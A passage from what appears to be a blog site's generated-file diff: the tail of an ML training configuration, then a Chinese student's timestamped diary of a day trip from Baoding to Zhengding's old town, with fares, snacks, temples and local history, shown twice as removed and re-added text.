    'SAVE_CODE': True, // 是否保存代码
    'SAVE_INIT_MODEL': True, // 是否保存初始化模型
    'SGD_MOMENTUM': 0.9, // SGD 优化器的动量
    'SGD_WEIGHT_DECAY': 0.0005, // SGD 优化器的权重衰减因子
    'SIGNATURE': ['texrnet', 'hrnet'], // 模型签名
    'SKIP_PARTIAL': True, // 是否跳过部分数据
    'UPDATE_CLASSIFIER': False, // 是否更新分类器参数
    'USE_OPTIM_MANAGER': True, // 是否使用优化器管理器
    'VISUAL': False}} // 是否可视化
    ]]>
    @@ -6995,7 +6995,7 @@ /posts/Diary-%E6%AD%A3%E5%AE%9A%E4%B9%8B%E6%97%85/ - 前言

    ​ 这篇博客记录了 2023.4.30,一阵正定特种兵旅游的流水账。

            

    jpg

    走死我了

    ​ 凡哥是真能走啊!凡神强,我投降😅!

    正文

    06:03-河百带学

    ​ 对本次出行的准备:

    • 07:20 - 08:32,保定到正定的火车票,¥18.50
    • 19:50 - 21:04,正定到保定的火车票,¥18.50
    • 一瓶矿泉水
    • 一个充电宝
    • 一包纸巾
    • 一个保温包
    • 一个水壶

    ​ 稍微在小红书上了解了一些但是不多,然后就,润!

    jpg

    清晨的冀大,晨曦

    ​ 因为从来没有去过保定站,事先给到车站留了很长的时间。05:30 起的床,上完厕所洗个漱,6:00 等宿管阿姨开门,准备出发。本来想在冀大食堂整两个肉夹馍吃,结果阿姨说饼还没热,好吧,我的肉夹馍😭。

    ​ 前一天晚上我 10 点多就睡了,凡哥居然凌晨 3 点才睡,一开始有点担心他,后来才知道是我多虑了😅。

    三点睡,五点起,阎王夸我好身体。

    ——凡哥

    06:16-润!

    jpg

    前往保定站

    ​ 还没出学校就喜迎第一憨。叫了个车想从小门出发,结果小门居然没开😅,怕等太长时间就提前叫了个车,结果车来的太快,一阵狂奔到南门。哇,还没开始玩就已经累了。

    ​ 北方的出租车司机似乎很爱说话,跟我们说出去玩很堵之类的,然后还说了一长串,但是河北口音我真的听不习惯啊!虽然没听懂,但也出于礼貌我就一直“好嘞好嘞”😅。

    ​ 冀大南门-保定站,¥22.00,大概半小时吧。

    06:28-保定站

    png

    挤但不算太挤

    ​ 这次坐火车,也算是以后可能要面对的自己坐动车来返学校做演练。来的还是早了些,在保定站里等了半个多小时。没吃早饭,但是想想到正定也不算太晚就决定到正定再吃。人还蛮多的,看到火车有点绷不住了,里面有点干净又卫生了😅。

    08:30-正定站

    jpg

    绿皮火车

    ​ 下了车觉得车站有点破😅,上次看到这么破的车站应该是在甘肃?

    jpg

    开冲!

    ​ 非常简朴的正定站

    正定如今是位于石家庄北部的一个小县城,但在历史上可是河北地区的重镇。正定旧名真定,南临滹沱河,西控太行山的井陉关口,是连接河北与山西、拱卫京畿的咽喉要地。正定最早设县的记录在秦朝,当时叫东垣县,汉高祖在此处平定叛乱后,为盼政权稳固,希望天下从此真正安定,改东垣县为真定县,此后一直沿用至清代。唐朝安史之乱之后,真定为成德军节度使治所所在地,成为藩镇割据的「小国都」,得到了较大的发展。正定城的形制,就是由成德军节度使李宝臣在应宝元年(762 年)重建而成的。唐宋时期,真定城内佛教兴盛,现存的不少古建筑都是当时留下的。明清时期,真定成为保卫京师的驻军重地,清初也做过河北省会(康熙年间直隶总督驻真定府),后因避世宗胤禛讳改真定府为正定府,沿用至今。20 世纪初,清廷修筑正太铁路。这条原定为正定到太原的铁路,最终因为滹沱河架桥的问题,起点改为了滹沱河南边的石家庄村,从此石家庄借铁路崛起,最后成为河北省省会,而原先风光的正定,则日渐衰落,成为如今略显萧条的小县城。

    08:44-批发市场

    png

    吃吃吃

    ​ 下了车第一件事,解决早饭!刚好火车站旁边有个批发市场,有卖早餐。这一段看了下正定城建,感觉比保定市区还要好一些🤔?

    ​ 整了点北方特色早餐:

    • 韭菜鸡蛋蒸饺,¥10.00 一屉 15 个
    • 煎饼果子,¥8.500
    • 1 * 鲜肉灌汤包 + 1 * 豆腐青椒包 + 1 * 金瓜小米粥 = 2 *¥1.50 + 1 *¥1.50 + 1 *¥3.00 =¥6.00

    ​ 不得不佩服凡哥是真的能吃😅,我留了两个包子中午吃。北方的面食确实好吃!

    09:40-滹沱河生态景区

    png

    滹(hū)沱,汉语词语,意思是守护陵墓人员的居住点😅

    滹沱河,古又作虖池或滹池,是海河水系子牙河的上游支流之一,它发源于山西省忻州市繁峙县泰戏山桥儿沟村一带,流经忻州市繁峙县、忻州市代县、忻州市原平市、忻州市忻府区、忻州市定襄县、阳泉市盂县、石家庄市平山县、石家庄灵寿县、石家庄市正定县、石家庄市藁城区、石家庄市无极县、石家庄市晋州市、石家庄市深泽县、衡水市安平县、衡水市饶阳县、衡水市武强县、沧州市献县,滹沱河在河北省沧州市献县与滏阳河交汇形成子牙河,滹沱河全长 587 公里,流域面积 2.73 万平方公里。

    ​ 打了个车到滹沱河生态景区,¥19.94。这一段路很有春天的味道!树林都是绿油油的。

    • 有划船项目,我把凡哥按住了没去划😅

    • 中间有一段火车主题的建筑,展示石家庄铁路很发达,是一个用火车拉来的城市

    • 远处还在修桥

    • 有段假沙滩,¥30.00 一次,可惜我也算是个老赶海家了不感兴趣😃

    • 有段萤火星河露营地,4 个人¥199 租一个营地,可以烧烤露营。石家庄也在努力整网红路线啊!

    • 凡哥看中对岸的揽秀塔,想要步行走过去。我看了看要走 4 多公里,快 2 个小时,就把凡哥按住了没走过去😅

    我跟阎王意见一致。

    ——关某

    10:40-会展中心

    png

    国际会展中心

    石家庄国际会展中心坐落在正定新区滹沱河北岸、新城大街西侧,附近有石家庄地铁 1 号线经过,总用地约 68.5 公顷,其中地上建筑面积 16 万平方米、地下建筑面积 3 万平方米,石家庄国际会展中心包括展览中心 10 万平方米、会议中心 6 万平方米及配套设施等;到 2008 年 5 月初为止,石家庄国际会展中心建设总工期为三年,总投资 20 亿元,项目建设所需资金,全部由石家庄市财政拨款解决,计划分三年投入。建设石家庄国际会展中心被认为是石家庄市的一件大事,是贯彻落实“每年一大步,三年大变样”要求的一项重要举措。被认为对于完善城市功能,提升城市形象,增强城市竞争力,提高城市影响力具有重要意义。

    ​ 往北走,稍微靠近点正定古城,结果来到了石家庄国际会展中心,凡哥说他从来没有看到过这么大的会展中心,不过我想说还是比福州的海峡国际会展中心略逊一筹🤔。里面还有漫展和车展,可以看到好多 coser。

    12:08-一阵堵车

    jpg

    堵堵堵,导航上一阵红

    ​ 凡哥又想步行走去正定古城!我看了看要走 4 多公里,快 2 个小时,就把凡哥按住了没走过去😅,叫了个车,¥16.14。热心的出租车司机给我们介绍了下石家庄,大致说:

    • 石家庄这个城市没什么历史底蕴,是“铁路拉来的城市”,正定和保定好些
    • 市区没啥好玩的,一般都是正定
    • 正定古城里很多建筑都只是仿古建筑而已
    • 正定古城里吃的并不贵
    • 石家庄美食有八大碗、安徽正宗牛肉板面,但是司机的口音会说成 ber 面🤪

    ​ 后来觉得司机说的还蛮对。

    ​ 坐车坐着坐着给我坐饿了,下车后就把早上买的俩包吃了。

    12:13-正定南城墙

    jpg

    这么近,那么美,周末到河北

    正定古城位于河北省会石家庄市北 15 公里处,是按照中华传统规划思想和建筑风格建设起来的城市,集中体现了公元 5 世纪至 19 世纪前后中国的历史文化特色,是古代劳动人民的聪明才智和坚强毅力的结晶。

    源远流长的历史,给古城留下了瑰玮灿烂、风格独特的文化名胜古迹,素以“三山不见,九桥不流,九楼四塔八大寺,二十四座金牌坊”而著称。
    三山不见”指的是历史上正定这块土地曾是中山国、恒山郡、常山郡的治所所在,但正定境内却没有山。
    九桥不流”说的是隆兴寺前面的一座单孔三路石桥、府文庙和县文庙大殿前面各有的一座泮桥(古代泮桥均为三桥并列的形制),但都无活水流过。
    九楼四塔八大寺”指的是原城内的四个门楼、四个角楼、还有阳和楼;四塔是凌霄塔、华塔、须弥塔、澄灵塔;八大寺指的是隆兴寺、广惠寺、临济寺、开元寺、天宁寺、洪济寺、舍利寺、崇因寺,后三寺已毁。
    二十四座金牌坊”是过去正定拥有大大小小二十四座金牌坊,例如像较大的许家牌坊、梁家牌坊、常山古郡、圣德通天、德配天地、木铎万事等。
    但是由于历史的变迁,风吹雨打,尤其是经历十年文革动乱,不少珍贵的文物被毁坏了,但从现有的国家保护文物 9 处、省级保护文物 6 处、县级保护文物 10 余处来看,正定仍不失为历史文化名城的风采。
    古城正定于 1990 年被列为省级历史文化名城,1994 年被列为国家级历史文化名城。

    历史上曾与保定北京并称为“北方三雄镇”。

    正定古城城墙门口展示着河北旅游的标语:这么近,那么美,周末到河北。听着像是给北京爷说的🤔。在停车场上确实看到了不少北京的车牌。

    png

    正定南城墙

    ​ 南城墙上面有个楼,然后你可以走楼梯上去看看风景。

    12:29-燕赵南大街

    jpg

    卖东西的燕赵南大街

    ​ 我们先去了最近的燕赵南大街,但我看里面没啥想吃的就没买,凡哥买了一串烤鱿鱼,¥16.00,一杯咖啡¥5.90。

    12:46-广惠寺

    png

    第一站:广惠寺

    ​ 第一站是广惠寺

    广惠寺华塔为八角砖雕砌仿木构楼阁式花塔,共四层,由主塔和附属小塔构成,全用砖砌,坐在同一方形基台上,总平面呈八角形。塔高 40.5 米,造型独特,结构富于变化。因塔身第三层以上八面八角的垂线有龙虎豹狮象及佛像等壁塑,形如花束,被称为华塔。

    ​ 这段时间正定古城里很多景点都是半价票,一张半价票¥7.50。

    13:15-临济寺

    png

    免费的临济寺

    临济寺不要门票?好评!¥0.00。最高的塔叫做临济寺澄灵塔。旁边有大雄宝殿,藏经楼啥的。

    临济寺始建于北朝东魏兴和二年(540 年)。《正定县志》载:“临济寺,东魏兴和二年建,在城东南二里许临济村。”概因濒临滹沱河渡口得名。今在其原址立有临济院旧址纪念碑。

    13:44-阳和楼

    png

    登高望远的阳和楼

    ​ 阳和楼前面有个关帝庙,拜一拜。中间是关公,旁边四个除了拿刀的是周仓以外,其他不知道😅。然后我还在禁止拍照的标语旁边拍照了,没注意。

    阳和楼位于河北省正定县城中心至南城门的中段,横跨正定城南门内南大街上。它始建于金末元初,元、明、清均有修葺。楼七楹、建立在高敞的砖台上,台下有圆拱洞门,左右各一,行人车马可以通行,其布局略似北京天安门端门,但南面正中还有关帝庙一所倚台建立。今人痛心的是阳和楼于二十世纪六十年代被拆毁。

    ​ 上阳和楼,¥3.00。可以登高看古城风景。

    13:54-正定历史文化街

    jpg

    凡哥买买买,我不买

    正定历史文化街的招牌让我想起了北京的琉璃厂,花花绿绿的。里面跟南后街差不多?反正都在卖东西。

    13:56-梁氏宗祠

    jpg

    小小的梁氏宗祠

    正定梁氏宗祠修建可能与梁梦龙及其父梁相有关,现存大门和建于明代晚期的祠堂。祠堂坐东朝西,面阔五间、进深七檩,采用单檐硬山顶,其中原供以梁氏先人牌位,现已改为他用。正定梁氏宗祠为梁氏家族历史上所建诸多建筑之幸存者,不仅是研究该家族的重要实物,也为正定古建筑发展序列增添了不同的建筑类别和文化内涵。

    ​ 正定历史文化街右侧有一个梁氏宗祠。正常¥10.00,现在免票¥0.00。不过我不太了解这里的历史,看不出什么东西😅。

    14:26-西安米皮

    png

    感觉有点不太划算的西安米皮店

    ​ 中午乱吃一通,去了文化街左侧一家西安米皮。凡哥要了碗热米皮,¥11.00,我要了个素夹馍,¥4.00。凡哥说热米皮不好吃,我觉得素夹馍也太简陋了点😅,相当于卤蛋¥1.50,一个馍¥2.50。其实在景区里,这价格也还好,比保定的贵比福州的便宜🤔。

    14:41-开元寺

    png

    买票还被人插队的开元寺

    ​ 吃完来到文化街左侧的开元寺。全票¥20.00,今日特惠¥10.00。有一只大鳄鱼和几只石狮子🤨。

    开元寺始建于东魏年间,唐代开元年间随大流改名为「开元寺」。开元寺现存完整建筑仅为钟楼与须弥塔一座。虽剩的不多,但这座钟楼来头可不小,上世纪 30 年代营造学社考察正定时,梁思成就称其为意外之喜,断定其可能为唐代木构遗存:「钟楼三间正方形,上层外部为后世重修,但内部及下层的雄大的斗栱,若说它是唐构,我也不能否认。」严格意义上来说,这应该是梁思成第一次见到唐代木构建筑。

    15:01-XX 胡同

    jpg

    石家庄四合院?

    ​ 进了一个不知道叫什么的胡同,有点像北京的四合院?

    15:05-XX 标语

    jpg

    标语

    ​ 正定县常山影剧院旁边的标语

    深入学习宣传贯彻党的二十大精神,解放思想、奋发进取,加快建设经济强省、美丽河北,为全面建设社会主义现代化国家、全面推进中华民族伟大复兴贡献力量。

    15:08-唐朝古碑

    jpg

    龟龟驮着的碑碑

    ​ 在唐朝古碑前面打了个卡就走了,无情的拍照机器🤐。下面有只石龟背着整个碑。

    15:17-天宁寺

    png

    绕七圈就世界大同的天宁寺凌霄塔

    天宁寺,旧名大藏院,北宋大中祥符年间(1008-1016)建,赐名“承天寺”。政和年间(1111-1118)始称天宁寺。宋高宗绍兴八年(公元 1138 年)为祀奉父王徽宗,赐名“报恩广寺”,后又改“报恩光寺”。现仅存天宁寺大殿。1988 年国务院公布为全国重点文物保护单位。天宁寺大殿是我国南方现存典型的元代木构建筑之一,面阔进深各为三间,单檐歇山顶。大殿当心间东首三桷柃下有“大元延祐五年岁在戊午六月庚申吉旦重建恭祝”的双钩墨题记。

    天宁寺。全票¥15.00,今日特惠¥7.50。这里还是人大历史学院实践基地🤔。天宁寺主体建筑是凌霄塔。塔前介绍说绕七圈世界大同,我就绕了一圈意思了下。凡哥真的绕完了七圈!我说不祈求啥世界大同,俄乌停火就行,凡哥直接说世界大同就是美国爆炸🤪。

    15:40-二五六医院

    jpg

    有特色的医院

    ​ 又看中了一个塔,结果看地图发现是二五六医院😅,还闻到一股消毒水的味道,这里连医院都修得这么古色古香的吗!

    15:50-旺泉南街

    jpg

    网红小街

    ​ 在去逛最大的隆兴寺之前,我们决定先吃点东西。来到了旺泉南街,这里感觉更有南后街的味道了。想去吃一碗正宗安徽牛肉 ber 面,结果发现没有,擦。八大碗一看就不是两个人能吃得下的,放弃。然后都是卖一些网红食品,烤串、臭豆腐、冰激凌之类的🤔。

    16:13-烧卖

    jpg

    好吃的肉烧卖

    ​ 最后还是去隆兴寺对面的小吃店整了一屉烧卖。10 个烧卖¥20.00。感觉里面是牛肉?我觉得很香,凡哥说肉有点腥他受不了🤔。

    16:21-隆兴寺

    png

    最大的隆兴寺

    ​ 然后就是正定古城里的老大哥——隆兴寺!规模确实蛮大的。这个票对一般人不半价,¥50.00,但是我们有学生证,耶!¥25.00。

    隆兴寺,别名大佛寺,位于河北省石家庄市正定县城东门里街,寺院始建于隋开皇六年(586 年),初名龙藏寺,唐改额龙兴寺,康熙四十九年(1710 年)赐额“隆兴寺”并沿用至今;是中国国内保存时代较早、规模较大而又保存完整的佛教寺院之一。
    寺院占地面积 82500 平方米,大小殿宇十余座,分布在南北中轴线及其两侧,高低错落,主次分明,是研究宋代佛教寺院建筑布局的重要实例。
    隆兴寺核定为中国 AAAA 级旅游景区、全国首批重点文物保护单位、中国十大名寺之一。

    • 据出租车司机介绍,有一个高 22 米的千手观音,走近看非常气派
    • 还有一些佛教壁画
    • 一些楼有那么一点像北京故宫
    • 有一个假山有点像北京景山,站在山上看风景,可惜不够高🤔
    • 一些佛教雕塑,我以为是经过风吹日晒都断了头,旁边人说是文革的时候被打烂了。北方当时闹文革还是凶猛啊🫣,直接把保定的省会揍没了

    17:34-赵云庙

    png

    吾乃石家庄赵子龙也!

    赵云庙位于河北省石家庄市正定县,1997 年正式对外开放。赵云字子龙,常山真定(今石家庄市古城东路一带)人,三国名将,有“常胜将军”之称。

    ​ 很多人都嘲笑石家庄这个名字太土,叫石门或者常山会好听很多。“吾乃石家庄赵子龙”,笑死。赵云庙今日特惠半票¥10.00。里面有很多雕塑,不过都是现代的,五虎上将啊,刘关张赵,刘关张赵诸葛啥的。有一丛修成小人拿着十八般兵器的园林,还有射箭项目,¥10.00 可以射 20 支,没射😅,居然还有当年长坂坡战场的黄土,靠不靠谱啊这个。

    18:02-荣国府

    png

    不知所云的荣国府

    ​ 之前出租车司机说荣国府就是个新建的建筑,如果不懂《红楼梦》别去,果然是这样😅。可是没办法,既然来都来了,强迫症驱使下还是进去了。¥40.00 不特惠但是学生证半票¥20.00。里面有很多红楼梦元素,林黛玉贾宝玉 balabala……可惜我这个粗人没看过《红楼梦》😅。有很多穿汉服的女孩子在里面拍照。

    荣国府是根据中国古典名著《红楼梦》严格设计和建造的,是一座具有明清风格的仿古建筑群,分府、街两大部分。荣国府是按照《红楼梦》中所描绘的“金门玉户神仙府,桂殿兰宫妃子家”建造的一座封建王宫,占地面积二万二千平方米。

    18:36-ber 面

    jpg

    没吃上 ber 面,血亏

    ​ 出来有一家 ber 面,¥10.00 一碗可惜没卖了,只有饸(hé)饹(le)面,没吃。

    18:55-正定北城墙

    jpg

    城墙原来的面貌

    ​ 又一阵走走到正定北城墙。这才是没修缮前城墙的原来样貌啊😅!

    19:00-正定一中

    jpg

    河北正定一中

    ​ 要赶 19:50 的火车,19:00 就打车润了,车费¥16.51。沿途看到的正定一中

    19:18-正定站

    jpg

    回!

    ​ 又回到了简朴的正定站

    jpg

    麻雀虽小,能用就行

    ​ 未免有点太简朴了喂!非常小的候车厅,然后连厕所还要到外面上,闸机也不用扫身份证🤔。

    19:47-润!

    jpg

    夜幕降临,你的故事结束了

    ​ 结果列车还晚点了 20 分钟,寄!

    21:32-保定站

    jpg

    晚上的保定站

    保定站,这个点叫车都不是很快,澡堂 22:00 关门啊喂!

    21:54-河百带学

    jpg

    最后一阵狂奔还是洗不上澡堂

    ​ 最后结果就是因为列车晚点 20 分钟导致 22:02 来到宿舍,就差一点,擦。然后我就又又又在阳台 DIY 了🤐。

    ]]>
    + 前言

    ​ 这篇博客记录了 2023.4.30,一阵正定特种兵旅游的流水账。

            

    jpg

    走死我了

    ​ 凡哥是真能走啊!凡神强,我投降😅!

    正文

    06:03-河百带学

    ​ 对本次出行的准备:

    • 07:20 - 08:32,保定到正定的火车票,¥18.50
    • 19:50 - 21:04,正定到保定的火车票,¥18.50
    • 一瓶矿泉水
    • 一个充电宝
    • 一包纸巾
    • 一个保温包
    • 一个水壶

    ​ 稍微在小红书上了解了一些但是不多,然后就,润!

    jpg

    清晨的冀大,晨曦

    ​ 因为从来没有去过保定站,事先给到车站留了很长的时间。05:30 起的床,上完厕所洗个漱,6:00 等宿管阿姨开门,准备出发。本来想在冀大食堂整两个肉夹馍吃,结果阿姨说饼还没热,好吧,我的肉夹馍😭。

    ​ 前一天晚上我 10 点多就睡了,凡哥居然凌晨 3 点才睡,一开始有点担心他,后来才知道是我多虑了😅。

    三点睡,五点起,阎王夸我好身体。

    ——凡哥

    06:16-润!

    jpg

    前往保定站

    ​ 还没出学校就喜迎第一憨。叫了个车想从小门出发,结果小门居然没开😅,怕等太长时间就提前叫了个车,结果车来的太快,一阵狂奔到南门。哇,还没开始玩就已经累了。

    ​ 北方的出租车司机似乎很爱说话,跟我们说出去玩很堵之类的,然后还说了一长串,但是河北口音我真的听不习惯啊!虽然没听懂,但也出于礼貌我就一直“好嘞好嘞”😅。

    ​ 冀大南门-保定站,¥22.00,大概半小时吧。

    06:28-保定站

    png

    挤但不算太挤

    ​ 这次坐火车,也算是以后可能要面对的自己坐动车来返学校做演练。来的还是早了些,在保定站里等了半个多小时。没吃早饭,但是想想到正定也不算太晚就决定到正定再吃。人还蛮多的,看到火车有点绷不住了,里面有点干净又卫生了😅。

    08:30-正定站

    jpg

    绿皮火车

    ​ 下了车觉得车站有点破😅,上次看到这么破的车站应该是在甘肃?

    jpg

    开冲!

    ​ 非常简朴的正定站

    正定如今是位于石家庄北部的一个小县城,但在历史上可是河北地区的重镇。正定旧名真定,南临滹沱河,西控太行山的井陉关口,是连接河北与山西、拱卫京畿的咽喉要地。正定最早设县的记录在秦朝,当时叫东垣县,汉高祖在此处平定叛乱后,为盼政权稳固,希望天下从此真正安定,改东垣县为真定县,此后一直沿用至清代。唐朝安史之乱之后,真定为成德军节度使治所所在地,成为藩镇割据的「小国都」,得到了较大的发展。正定城的形制,就是由成德军节度使李宝臣在应宝元年(762 年)重建而成的。唐宋时期,真定城内佛教兴盛,现存的不少古建筑都是当时留下的。明清时期,真定成为保卫京师的驻军重地,清初也做过河北省会(康熙年间直隶总督驻真定府),后因避世宗胤禛讳改真定府为正定府,沿用至今。20 世纪初,清廷修筑正太铁路。这条原定为正定到太原的铁路,最终因为滹沱河架桥的问题,起点改为了滹沱河南边的石家庄村,从此石家庄借铁路崛起,最后成为河北省省会,而原先风光的正定,则日渐衰落,成为如今略显萧条的小县城。

    08:44-批发市场

    png

    吃吃吃

    ​ 下了车第一件事,解决早饭!刚好火车站旁边有个批发市场,有卖早餐。这一段看了下正定城建,感觉比保定市区还要好一些🤔?

    ​ 整了点北方特色早餐:

    • 韭菜鸡蛋蒸饺,¥10.00 一屉 15 个
    • 煎饼果子,¥8.500
    • 1 * 鲜肉灌汤包 + 1 * 豆腐青椒包 + 1 * 金瓜小米粥 = 2 *¥1.50 + 1 *¥1.50 + 1 *¥3.00 =¥6.00

    ​ 不得不佩服凡哥是真的能吃😅,我留了两个包子中午吃。北方的面食确实好吃!

    09:40-滹沱河生态景区

    png

    滹(hū)沱,汉语词语,意思是守护陵墓人员的居住点😅

    滹沱河,古又作虖池或滹池,是海河水系子牙河的上游支流之一,它发源于山西省忻州市繁峙县泰戏山桥儿沟村一带,流经忻州市繁峙县、忻州市代县、忻州市原平市、忻州市忻府区、忻州市定襄县、阳泉市盂县、石家庄市平山县、石家庄灵寿县、石家庄市正定县、石家庄市藁城区、石家庄市无极县、石家庄市晋州市、石家庄市深泽县、衡水市安平县、衡水市饶阳县、衡水市武强县、沧州市献县,滹沱河在河北省沧州市献县与滏阳河交汇形成子牙河,滹沱河全长 587 公里,流域面积 2.73 万平方公里。

    ​ 打了个车到滹沱河生态景区,¥19.94。这一段路很有春天的味道!树林都是绿油油的。

    • 有划船项目,我把凡哥按住了没去划😅

    • 中间有一段火车主题的建筑,展示石家庄铁路很发达,是一个用火车拉来的城市

    • 远处还在修桥

    • 有段假沙滩,¥30.00 一次,可惜我也算是个老赶海家了不感兴趣😃

    • 有段萤火星河露营地,4 个人¥199 租一个营地,可以烧烤露营。石家庄也在努力整网红路线啊!

    • 凡哥看中对岸的揽秀塔,想要步行走过去。我看了看要走 4 多公里,快 2 个小时,就把凡哥按住了没走过去😅

    我跟阎王意见一致。

    ——关某

    10:40-会展中心

    png

    国际会展中心

    石家庄国际会展中心坐落在正定新区滹沱河北岸、新城大街西侧,附近有石家庄地铁 1 号线经过,总用地约 68.5 公顷,其中地上建筑面积 16 万平方米、地下建筑面积 3 万平方米,石家庄国际会展中心包括展览中心 10 万平方米、会议中心 6 万平方米及配套设施等;到 2008 年 5 月初为止,石家庄国际会展中心建设总工期为三年,总投资 20 亿元,项目建设所需资金,全部由石家庄市财政拨款解决,计划分三年投入。建设石家庄国际会展中心被认为是石家庄市的一件大事,是贯彻落实“每年一大步,三年大变样”要求的一项重要举措。被认为对于完善城市功能,提升城市形象,增强城市竞争力,提高城市影响力具有重要意义。

    ​ 往北走,稍微靠近点正定古城,结果来到了石家庄国际会展中心,凡哥说他从来没有看到过这么大的会展中心,不过我想说还是比福州的海峡国际会展中心略逊一筹🤔。里面还有漫展和车展,可以看到好多 coser。

    12:08-一阵堵车

    jpg

    堵堵堵,导航上一阵红

    ​ 凡哥又想步行走去正定古城!我看了看要走 4 多公里,快 2 个小时,就把凡哥按住了没走过去😅,叫了个车,¥16.14。热心的出租车司机给我们介绍了下石家庄,大致说:

    • 石家庄这个城市没什么历史底蕴,是“铁路拉来的城市”,正定和保定好些
    • 市区没啥好玩的,一般都是正定
    • 正定古城里很多建筑都只是仿古建筑而已
    • 正定古城里吃的并不贵
    • 石家庄美食有八大碗、安徽正宗牛肉板面,但是司机的口音会说成 ber 面🤪

    ​ 后来觉得司机说的还蛮对。

    ​ 坐车坐着坐着给我坐饿了,下车后就把早上买的俩包吃了。

    12:13-正定南城墙

    jpg

    这么近,那么美,周末到河北

    正定古城位于河北省会石家庄市北 15 公里处,是按照中华传统规划思想和建筑风格建设起来的城市,集中体现了公元 5 世纪至 19 世纪前后中国的历史文化特色,是古代劳动人民的聪明才智和坚强毅力的结晶。

    源远流长的历史,给古城留下了瑰玮灿烂、风格独特的文化名胜古迹,素以“三山不见,九桥不流,九楼四塔八大寺,二十四座金牌坊”而著称。
    三山不见”指的是历史上正定这块土地曾是中山国、恒山郡、常山郡的治所所在,但正定境内却没有山。
    九桥不流”说的是隆兴寺前面的一座单孔三路石桥、府文庙和县文庙大殿前面各有的一座泮桥(古代泮桥均为三桥并列的形制),但都无活水流过。
    九楼四塔八大寺”指的是原城内的四个门楼、四个角楼、还有阳和楼;四塔是凌霄塔、华塔、须弥塔、澄灵塔;八大寺指的是隆兴寺、广惠寺、临济寺、开元寺、天宁寺、洪济寺、舍利寺、崇因寺,后三寺已毁。
    二十四座金牌坊”是过去正定拥有大大小小二十四座金牌坊,例如像较大的许家牌坊、梁家牌坊、常山古郡、圣德通天、德配天地、木铎万事等。
    但是由于历史的变迁,风吹雨打,尤其是经历十年文革动乱,不少珍贵的文物被毁坏了,但从现有的国家保护文物 9 处、省级保护文物 6 处、县级保护文物 10 余处来看,正定仍不失为历史文化名城的风采。
    古城正定于 1990 年被列为省级历史文化名城,1994 年被列为国家级历史文化名城。

    历史上曾与保定北京并称为“北方三雄镇”。

    正定古城城墙门口展示着河北旅游的标语:这么近,那么美,周末到河北。听着像是给北京爷说的🤔。在停车场上确实看到了不少北京的车牌。

    png

    正定南城墙

    ​ 南城墙上面有个楼,然后你可以走楼梯上去看看风景。

    12:29-燕赵南大街

    jpg

    卖东西的燕赵南大街

    ​ 我们先去了最近的燕赵南大街,但我看里面没啥想吃的就没买,凡哥买了一串烤鱿鱼,¥16.00,一杯咖啡¥5.90。

    12:46-广惠寺

    png

    第一站:广惠寺

    ​ 第一站是广惠寺

    广惠寺华塔为八角砖雕砌仿木构楼阁式花塔,共四层,由主塔和附属小塔构成,全用砖砌,坐在同一方形基台上,总平面呈八角形。塔高 40.5 米,造型独特,结构富于变化。因塔身第三层以上八面八角的垂线有龙虎豹狮象及佛像等壁塑,形如花束,被称为华塔。

    ​ 这段时间正定古城里很多景点都是半价票,一张半价票¥7.50。

    13:15-临济寺

    png

    免费的临济寺

    临济寺不要门票?好评!¥0.00。最高的塔叫做临济寺澄灵塔。旁边有大雄宝殿,藏经楼啥的。

    临济寺始建于北朝东魏兴和二年(540 年)。《正定县志》载:“临济寺,东魏兴和二年建,在城东南二里许临济村。”概因濒临滹沱河渡口得名。今在其原址立有临济院旧址纪念碑。

    13:44-阳和楼

    png

    登高望远的阳和楼

    ​ 阳和楼前面有个关帝庙,拜一拜。中间是关公,旁边四个除了拿刀的是周仓以外,其他不知道😅。然后我还在禁止拍照的标语旁边拍照了,没注意。

    阳和楼位于河北省正定县城中心至南城门的中段,横跨正定城南门内南大街上。它始建于金末元初,元、明、清均有修葺。楼七楹、建立在高敞的砖台上,台下有圆拱洞门,左右各一,行人车马可以通行,其布局略似北京天安门端门,但南面正中还有关帝庙一所倚台建立。今人痛心的是阳和楼于二十世纪六十年代被拆毁。

    ​ 上阳和楼,¥3.00。可以登高看古城风景。

    13:54-正定历史文化街

    jpg

    凡哥买买买,我不买

    正定历史文化街的招牌让我想起了北京的琉璃厂,花花绿绿的。里面跟南后街差不多?反正都在卖东西。

    13:56-梁氏宗祠

    jpg

    小小的梁氏宗祠

    正定梁氏宗祠修建可能与梁梦龙及其父梁相有关,现存大门和建于明代晚期的祠堂。祠堂坐东朝西,面阔五间、进深七檩,采用单檐硬山顶,其中原供以梁氏先人牌位,现已改为他用。正定梁氏宗祠为梁氏家族历史上所建诸多建筑之幸存者,不仅是研究该家族的重要实物,也为正定古建筑发展序列增添了不同的建筑类别和文化内涵。

    ​ 正定历史文化街右侧有一个梁氏宗祠。正常¥10.00,现在免票¥0.00。不过我不太了解这里的历史,看不出什么东西😅。

    14:26-西安米皮

    png

    感觉有点不太划算的西安米皮店

    ​ 中午乱吃一通,去了文化街左侧一家西安米皮。凡哥要了碗热米皮,¥11.00,我要了个素夹馍,¥4.00。凡哥说热米皮不好吃,我觉得素夹馍也太简陋了点😅,相当于卤蛋¥1.50,一个馍¥2.50。其实在景区里,这价格也还好,比保定的贵比福州的便宜🤔。

    14:41-开元寺

    png

    买票还被人插队的开元寺

    ​ 吃完来到文化街左侧的开元寺。全票¥20.00,今日特惠¥10.00。有一只大鳄鱼和几只石狮子🤨。

    开元寺始建于东魏年间,唐代开元年间随大流改名为「开元寺」。开元寺现存完整建筑仅为钟楼与须弥塔一座。虽剩的不多,但这座钟楼来头可不小,上世纪 30 年代营造学社考察正定时,梁思成就称其为意外之喜,断定其可能为唐代木构遗存:「钟楼三间正方形,上层外部为后世重修,但内部及下层的雄大的斗栱,若说它是唐构,我也不能否认。」严格意义上来说,这应该是梁思成第一次见到唐代木构建筑。

    15:01-XX 胡同

    jpg

    石家庄四合院?

    ​ 进了一个不知道叫什么的胡同,有点像北京的四合院?

    15:05-XX 标语

    jpg

    标语

    ​ 正定县常山影剧院旁边的标语

    深入学习宣传贯彻党的二十大精神,解放思想、奋发进取,加快建设经济强省、美丽河北,为全面建设社会主义现代化国家、全面推进中华民族伟大复兴贡献力量。

    15:08-唐朝古碑

    jpg

    龟龟驮着的碑碑

    ​ 在唐朝古碑前面打了个卡就走了,无情的拍照机器🤐。下面有只石龟背着整个碑。

    15:17-天宁寺

    png

    绕七圈就世界大同的天宁寺凌霄塔

